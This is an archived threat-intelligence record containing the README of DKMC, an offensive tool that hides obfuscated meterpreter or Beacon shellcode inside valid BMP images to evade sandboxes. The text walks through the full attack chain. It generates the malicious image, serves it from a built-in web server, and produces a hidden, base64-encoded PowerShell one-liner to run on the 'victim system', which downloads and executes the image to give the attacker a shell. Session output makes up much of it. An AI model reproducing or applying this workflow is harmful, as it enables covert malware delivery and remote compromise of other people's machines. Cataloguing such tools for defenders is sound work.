{
	"id": "35f94dce-fb6c-44ec-bb59-9636341d5cb8",
	"created_at": "2026-04-06T00:10:25.284409Z",
	"updated_at": "2026-04-10T03:21:26.678607Z",
	"deleted_at": null,
	"sha1_hash": "9bd55a6226258175818f0cde16ef33bd55d8cdc5",
	"title": "GitHub - Exploit-install/DKMC: DKMC - Dont kill my cat - Malicious payload evasion tool",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 51589,
	"plain_text": "GitHub - Exploit-install/DKMC: DKMC - Dont kill my cat -\r\nMalicious payload evasion tool\r\nBy Mr-Un1k0d3r\r\nArchived: 2026-04-05 20:41:21 UTC\r\nDon't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is\r\n100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple \"legit\" image.\r\nFor now the tool rely on PowerShell the execute the final shellcode payload.\r\nWhy it's called don't kill my cat? Since I suck at finding names for tools, I decided to rely on the fact that the\r\ndefault BMP image is a cat to name the tool.\r\nPresentation on how it works internally can be found here: https://github.com/Mr-Un1k0d3r/DKMC/blob/master/DKMC%20presentation%202017.pdf\r\nBasic Flow\r\nGenerate shellcode (meterpreter / Beacon)\r\nEmbed the obfuscated shellcode inside the image\r\nPowerShell download the image and execute the image as shellcode\r\nGet your shell\r\nUsage\r\nLaunching DKMC\r\n$ python dkmc.py\r\nDKMC - Don't kill my cat\r\n Evasion tool - Mr.Un1k0d3r RingZer0 Team\r\n |\\ _,,,---,,_\r\n /,`.-'`' -. ;-;;,_\r\n |,4- ) )-,_..;\\ ( `'-'\r\n '---''(_/--' `-'\\_) The sleepy cat\r\n----------------------------------------------------\r\nSelect an option:\r\n [*] (gen) Generate a malicious BMP image\r\n [*] (web) Start a web server and deliver malicious image\r\n [*] (ps) Generate Powershell payload\r\nhttps://github.com/Exploit-install/DKMC\r\nPage 1 of 3\n\n[*] (sc) Generate shellcode from raw file\r\n [*] (exit) Quit the application\r\n\u003e\u003e\u003e\r\nGenerate shellcode from a raw file\r\n\u003e\u003e\u003e sc\r\n(shellcode)\u003e\u003e\u003e set source shellcode.txt\r\n [+] source value is set.\r\n(shellcode)\u003e\u003e\u003e run\r\n [+] Shellcode:\r\n\\x41\\x41\\x41\\x41\r\nGenerate the obfuscated shellcode embedded inside of an image.\r\n\u003e\u003e\u003e gen\r\n(generate)\u003e\u003e\u003e set shellcode \\x41\\x41\\x41\\x41\r\n [+] shellcode value is set.\r\n \r\n(generate)\u003e\u003e\u003e run\r\n [+] Image size is 300 x 275\r\n [+] Generating obfuscation key 0x1f1dad93\r\n [+] Shellcode size 0x4 (4) bytes\r\n [+] Generating magic bytes 0xa4d0c752\r\n [+] Final shellcode length is 0x57 (87) bytes\r\n [+] New BMP header set to 0x424de9a4c60300\r\n [+] New height is 0x0e010000 (270)\r\n [+] Successfully save the image. (/home/ringzer0/tools/DKMC/output/output-1496175261.bmp)\r\n(generate)\u003e\u003e\u003e\r\nGenerate PowerShell payload to execute on the victim system.\r\n\u003e\u003e\u003e ps\r\n(powershell)\u003e\u003e\u003e set url http://127.0.0.1:8080/output-1496175261.bmp\r\n [+] url value is set.\r\n(powershell)\u003e\u003e\u003e run\r\n [+] Powershell script:\r\npowershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA\r\n(powershell)\u003e\u003e\u003e\r\nhttps://github.com/Exploit-install/DKMC\r\nPage 2 of 3\n\nBuilt-in Web Server to deliver the image\r\n\u003e\u003e\u003e web\r\n(web)\u003e\u003e\u003e set port 8080\r\n [+] port value is set.\r\n(web)\u003e\u003e\u003e run\r\n [+] Starting web server on port 8080\r\n127.0.0.1 - - [30/May/2017 16:18:43] \"GET /output-1496175261.bmp HTTP/1.1\" 200 -\r\nFinal step require you to run the PowerShell oneliner on the victim system.\r\nTODO\r\nSupport more file format.\r\nCredit\r\nMr.Un1k0d3r RingZer0 Team 2016\r\nSource: https://github.com/Exploit-install/DKMC\r\nhttps://github.com/Exploit-install/DKMC\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/Exploit-install/DKMC"
	],
	"report_names": [
		"DKMC"
	],
	"threat_actors": [],
	"ts_created_at": 1775434225,
	"ts_updated_at": 1775791286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9bd55a6226258175818f0cde16ef33bd55d8cdc5.pdf",
		"text": "https://archive.orkl.eu/9bd55a6226258175818f0cde16ef33bd55d8cdc5.txt",
		"img": "https://archive.orkl.eu/9bd55a6226258175818f0cde16ef33bd55d8cdc5.jpg"
	}
}